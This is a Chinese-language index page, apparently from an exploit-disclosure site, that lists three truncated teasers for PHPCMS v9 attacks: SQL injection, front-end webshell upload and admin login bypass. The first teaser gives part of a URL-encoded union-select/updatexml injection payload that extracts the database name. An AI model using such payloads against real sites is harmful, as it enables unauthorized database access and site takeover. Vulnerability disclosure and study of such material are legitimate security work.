• phpcms v9最新高危sql注入exp

    phpcms v9最新高危sql注入exp
    获取当前数据库 http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login post: forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabase())%2...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:15,681次 | 标签:
  • phpcms v9 前台无限制GETSHELL

    phpcms v9 前台无限制GETSHELL
    0x01:介绍 PHPCMS V9(后面简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。 5年开发经验的优秀团队,在掌握了丰富的WEB开发经验和CMS产品开发经验的同时,勇于创新追求完美的设计理念,为全球多达10万网站提供助力,并被更多的...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:8,787次 | 标签:
  • phpcmsv9后台登录绕过

    phpcmsv9后台登录绕过
    (在注入出的hash无法破解的情况下) phpcmsv9在数据库中存储着session <?php return array( //网站路径 'web_path' => '/phpcms/install_package/', //Session配置 'session_storage' => 'mysql', 'session_ttl' => 1800, 'session_savepath' => CACHE_PATH.'sessions/', 'session_n' => 0, //Cookie配置 'cookie_domain' => '', //Cookie 作用域 'cookie_path' =>...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:11,143次 | 标签:,